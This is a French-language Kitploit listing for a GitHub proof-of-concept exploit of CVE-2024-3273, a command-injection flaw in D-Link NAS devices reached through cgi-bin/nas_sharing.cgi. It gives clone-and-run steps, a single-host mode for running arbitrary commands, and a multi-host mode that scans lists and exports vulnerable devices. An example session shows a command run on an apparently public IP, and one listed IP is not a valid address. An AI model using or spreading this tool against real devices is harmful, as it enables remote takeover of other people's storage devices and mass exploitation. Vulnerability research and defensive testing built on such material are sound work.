Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2024-3273 — Exploit pour CVE-2024-3273, supporte les hôtes uniques et multiples | Kitploit
Outils/GitHubGitHub/adhikara13/cve-2024-3273
Analyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionCommandement et ContrôleRed Teaming
GitHubadhikara13/cve-2024-3273

CVE-2024-3273

Exploit pour CVE-2024-3273, supporte les hôtes uniques et multiples

Voir le dépôt
1311il y a 2 ansPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2024-3273 Preuve de Concept (PoC)

Ce dépôt contient une Preuve de Concept (PoC) pour CVE-2024-3273, une vulnérabilité de sécurité découverte dans les périphériques NAS D-Link. La vulnérabilité permet aux attaquants d'exécuter des commandes arbitraires sur les appareils vulnérables.

Description

CVE-2024-3273 est une vulnérabilité dans les périphériques NAS D-Link qui permet aux attaquants distants d'exécuter des commandes arbitraires via une requête HTTP spécialement conçue vers le point d'accès cgi-bin/nas_sharing.cgi.

Cette PoC montre comment la vulnérabilité peut être exploitée pour exécuter des commandes sur des périphériques NAS D-Link vulnérables.

Prérequis

  • Python 3.x
  • Bibliothèque requests

Utilisation

  1. Clonez ce dépôt :

    root@kitploit:~
    git clone https://github.com/adhikara13/CVE-2024-3273.git
    
  2. Accédez au répertoire du dépôt :

    root@kitploit:~
    cd CVE-2024-3273
    
  • Exécutez la PoC :

    root@kitploit:~
    python main.py
    
  • Suivez les instructions à l'écran pour choisir le périphérique cible :

    • Option 1 : Hôte unique (1) : Saisissez les détails pour un seul périphérique cible, y compris l'adresse IP de l'hôte et la commande à exécuter.
    • Option 2 : Hôtes multiples (2) : Fournissez un fichier contenant plusieurs périphériques cibles au format host:port, et choisissez s'il faut exporter les hôtes vulnérables vers vulnerables.txt.
  • Exemple

    root@kitploit:~
    ┏┓┓┏┏┓  ┏┓┏┓┏┓┏┓  ┏┓┏┓━┓┏┓
    ┃ ┃┃┣ ━━┏┛┃┫┏┛┃┃━━ ┫┏┛ ┃ ┫
    ┗┛┗┛┗┛  ┗━┗┛┗━┗╋  ┗┛┗━ ╹┗┛
    
    Choose an option (1: Single Host, 2: Multiple Hosts): 1
    Enter the host: 114.32.179.200
    Enter the command to run: ls
    Response from 114.32.179.200:
    box.cgi
    codepage_mgr.cgi
    download_mgr.cgi
    dropbox.cgi
    folder_tree.cgi
    
    ┏┓┓┏┏┓  ┏┓┏┓┏┓┏┓  ┏┓┏┓━┓┏┓
    ┃ ┃┃┣ ━━┏┛┃┫┏┛┃┃━━ ┫┏┛ ┃ ┫
    ┗┛┗┛┗┛  ┗━┗┛┗━┗╋  ┗┛┗━ ╹┗┛
    
    Choose an option (1: Single Host, 2: Multiple Hosts): 2
    Enter the file path containing hosts: list.txt
    Export vulnerable host to vulnerables.txt? (y/n): y
    Connection error for host 87.205.188.21:9290.
    Connection error for host 186.212.112.141:8081.
    Host 124.120.263.149:8032 is vulnerable.
    

    Avertissement

    Cette PoC est uniquement destinée à des fins éducatives et de recherche. Utilisez-la de manière responsable et uniquement sur des appareils que vous êtes autorisé à tester.

    Contribution

    Les contributions sont les bienvenues ! Si vous trouvez des problèmes ou des améliorations, n'hésitez pas à ouvrir une issue ou à créer une pull request.

    Télécharger l’outil